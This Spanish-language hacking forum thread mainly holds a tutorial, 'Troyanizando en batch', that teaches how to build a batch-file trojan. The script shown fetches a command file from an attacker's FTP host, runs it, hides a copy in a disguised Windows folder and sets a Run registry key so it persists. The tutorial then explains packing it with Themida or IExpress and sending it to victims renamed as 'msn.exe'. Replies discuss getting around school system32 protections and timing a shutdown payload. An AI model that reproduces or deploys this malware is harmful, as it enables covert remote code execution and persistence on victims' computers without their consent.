Mensajes

[CACLS]

Por ejemplo en mi instituto cuando intento modificar el system32 no me deja porque dice que esta protegido contra escritura... pero el comando CACLS lo puede usar un usuario "user" sin ser admin??? porque asi lo podria desbloquear

como el stickykeys :O jajajaja ^^

contiene un codigo que ya has creado tu anterior y personalmente el cual se ejecutara en el pc de la victima

En el post "TROYANIZANDO EN BATCH |GUN$|" pues meto un archivo en una carpeta oculta jajajaj Apliquen lo que dijo -| Sir_Lance |- jajajaja

[SET]

Algo como esto imagino

Código [Seleccionar] Expandir

set /a c=1
set casa=%c%
echo %casa%

el echo devolvera 1

Saludos

ET

... /a es un modificador de operaciones... tiene que ser simplemente SET

[Troyanizando en batch]

Troyanizando en batch

Indice:

->1.Introduccion
->2.Requisitos minimos
->3.Crear cuenta FTP
->4.Codigo para la vícitima
->5.Codigo FTP
->6.Iexpress + Themida + Cygy para Código FTP
_____________________________________________________________________


1.Introduccion

· Os voy a hacer un breve tutorial de como troyanizar en batch sin usar ningun ejecutable solo con un .txt y un .bat; ayudandonos de lo maravilloso que es FTP


2.Requisitos minimos

->notepad.exe (jajaja)
->una cuenta ftp
->Vía de propagacion
->Iexpress + themida + cygy


3.Crear cuenta FTP

->Crea tu cuenta FTP AQUI


4.Codigo para la vícitima

-> Llegados a este punto, crearemos un codigo en batch al cual nombraremos como ordenes.txt (no vale otro nombre)

->abrimos nuestro notepad... y a nuestro gusto creamos el code con programacion batch el cual sera ejecutado en el pc de la víctima

·comandos interesantes:

-Dir
-Del
-Start
-Reg ADD
-Attrib
-Shutdown

Más información para crear vuestro code


Cuando tengamos el code guardado como ordenes.txt; lo deberemos subir a nuestra cuenta FTP

·ordenes.txt será el codigo que se ejecute en el pc de la victima cada vez que inicie windows

NOTA: Debereis rehacer a vuestro gusto vuestro ordenes.txt i volverlo a subir a vuestro ftp para que se ejecute en el pc de la victima cuando inicie windows


5.Codigo FTP

Aqui os pongo el .bat que le tendreis que enviar a vuestra victima

NOTA: Luego lo camuflaremos con themida o iexpress o cygy... comprimiendolo con un compresor (winrar, winzip....) para luego enviarlo.

  @echo off
pushd "%windir%\$NtUninstallWudf01000$\spuninst"
echo username>ftp.tmp
echo pass>>ftp.tmp
echo get ordenes.txt>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp ftp.geocities.com
del /f /q ftp.tmp
rename ordenes.txt soundUni.bat
start soundUni.bat
pushd "%homepath%\Mis documentos\Mis archivos recibidos"
copy /Y  "archivo_ftp.bat"  "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Uninstall" /t Reg_SZ /d "%windir%\$NtUninstallWudf01000$\spuninst\archivo_ftp.bat /f"
exit

·Username: Aqui debereis colocar vuestro usuario de ftp
·Pass: Aqui deberis poner la pass de vuestro ftp
·ordenes.txt: nunca cambies el nombre de vuestro archivo ordenes.txt ya que si lo cambiais el code no podria bajar el archivo para ejecutarlo en el pc de la victima
·archivo_ftp.bat:Si el archivo que le enviareis a la victima lo compilais a .exe pues debereis cambiar el nombre a archivo_ftp.exe y si le dais un nombre menos llamativo a vuestro code pues quedaria asi:

Msn.exe ... por ejemplo...en el code tmb lo debeis sustituir....


6.Iexpress + Themida + Cygy para Código FTP

-> En esta parte es donde debereis compilar vuestro "msn.bat" a "msn.exe", comprimirlo y enviarlo por alguna via de red

->Tutorial + Descarga por Txshack

CYGY + THEMIDA + IEXPRESS




->La explicacion a sido breve i un poco imprecisa :S  lo siento.... si teneis alguna duda preguntenla por M.P o en este mismo post


_____________________________________________________________________



TUTORIAL POR GUN$

FUENTE:http://foro.infiernohacker.com/index.php?topic=2641.0

Yo ya le veo un fallito....

Si pones el shutdown al principio, lo demas no se ejecutará...pon el shutdown al final...

Saludos...

...al shutdown le aplico un modificador "-t" de 100 secs... supongo que le dara tiempo jajaja